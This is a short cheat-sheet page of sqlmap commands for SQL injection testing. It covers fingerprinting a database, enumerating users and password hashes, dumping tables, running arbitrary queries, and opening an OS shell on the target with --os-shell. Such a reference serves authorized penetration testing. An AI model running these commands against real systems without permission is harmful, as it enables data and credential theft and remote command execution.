Skip to content

SQLMap commandsΒΆ

Test URL and POST data and return database banner (if possible)

./sqlmap.py --url="<url>" --data="<post-data>" --banner

Test Multiple URLs with default values and extract database names, saving results

./sqlmap.py -m urls.txt --batch --dbs --output-dir=result

Parse request data and test (request data can be obtained with Burp)

./sqlmap.py -r <request-file> <options>

Fingerprint (provides more information than banner)

./sqlmap.py -r <request-file> --fingerprint

Get database username, name, and hostname

./sqlmap.py -r <request-file> --current-user --current-db --hostname

Check if user is a database admin

./sqlmap.py -r <request-file> --is-dba

Get database users and password hashes

./sqlmap.py -r <request-file> --users --passwords

Enumerate databases

./sqlmap.py -r <request-file> --dbs

List tables for one database

./sqlmap.py -r <request-file> -D <db-name> --tables

Other database commands

./sqlmap.py -r <request-file> -D <db-name> --columns
              --schema
              --count

Enumeration flags

./sqlmap.py -r <request-file> -D <db-name>
                  -T <tbl-name>
                  -C <col-name>
                  -U <user-name>

Extract data

./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Execute SQL Query

./sqlmap.py -r <request-file> --sql-query="<sql-query>"

Append/Prepend SQL Queries

./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

Get backdoor access to SQL server (can provide shell access)

./sqlmap.py -r <request-file> --os-shell